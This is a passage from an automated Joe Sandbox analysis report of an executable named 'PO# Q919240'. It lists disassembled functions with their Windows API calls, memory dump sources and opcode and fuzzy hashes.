                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Menu$Delete$InfoItem
                • String ID: 0
                • API String ID: 135850232-4108050209
                • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                Function 004507B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                Download Yara Rule
                APIs
                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Window$Long
                • String ID: SysTreeView32
                • API String ID: 847901565-1698111956
                • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                Function 00434B02 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 108libraryloaderCOMMON
                Download Yara Rule
                APIs
                • LoadLibraryA.KERNEL32(?), ref: 00434B10
                • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                • FreeLibrary.KERNEL32(?), ref: 00434B9F
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Library$AddressFreeLoadProc
                • String ID: AU3_GetPluginDetails
                • API String ID: 145871493-4132174516
                • Opcode ID: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                • Opcode Fuzzy Hash: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                Function 00450D6B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: MessageSend$Window
                • String ID: SysMonthCal32
                • API String ID: 2326795674-1439706946
                • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                Function 004509D8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97COMMON
                Download Yara Rule
                APIs
                • DestroyWindow.USER32(00000000), ref: 00450A2F
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: DestroyWindow
                • String ID: msctls_updown32
                • API String ID: 3375834691-2298589950
                • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                Function 0044DC13 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 95COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _memmove
                • String ID: $<
                • API String ID: 4104443479-428540627
                • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                Function 0045D779 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON
                Download Yara Rule
                APIs
                • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ErrorMode$DiskFreeSpace
                • String ID: \VH
                • API String ID: 1682464887-234962358
                • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                Function 0045D78F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                Download Yara Rule
                APIs
                • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ErrorMode$DiskFreeSpace
                • String ID: \VH
                • API String ID: 1682464887-234962358
                • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                Function 0045D86D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                Download Yara Rule
                APIs
                • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ErrorMode$DiskFreeSpace
                • String ID: \VH
                • API String ID: 1682464887-234962358
                • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                Function 0045D36D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                Download Yara Rule
                APIs
                • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ErrorMode$InformationVolume
                • String ID: \VH
                • API String ID: 2507767853-234962358
                • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                Function 0045D53E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                Download Yara Rule
                APIs
                • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ErrorMode$InformationVolume
                • String ID: \VH
                • API String ID: 2507767853-234962358
                • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                Function 00450ACC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: MessageSend
                • String ID: msctls_trackbar32
                • API String ID: 3850602802-1010561917
                • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                Function 00435215 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                • String ID: crts
                • API String ID: 943502515-3724388283
                • Opcode ID: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                • Opcode Fuzzy Hash: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                Function 0045D2C7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58COMMON
                Download Yara Rule
                APIs
                • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                • SetErrorMode.KERNEL32(?), ref: 0045D35C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ErrorMode$LabelVolume
                • String ID: \VH
                • API String ID: 2006950084-234962358
                • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                Function 004496E9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                • GetMenuItemInfoW.USER32 ref: 00449727
                • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                • DrawMenuBar.USER32 ref: 00449761
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Menu$InfoItem$Draw_malloc
                • String ID: 0
                • API String ID: 772068139-4108050209
                • Opcode ID: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                • Opcode Fuzzy Hash: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                Function 00472A2B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _wcslen$_wcscpy
                • String ID: 3, 3, 8, 1
                • API String ID: 3469035223-357260408
                • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                Function 004312CC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                Download Yara Rule
                APIs
                • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
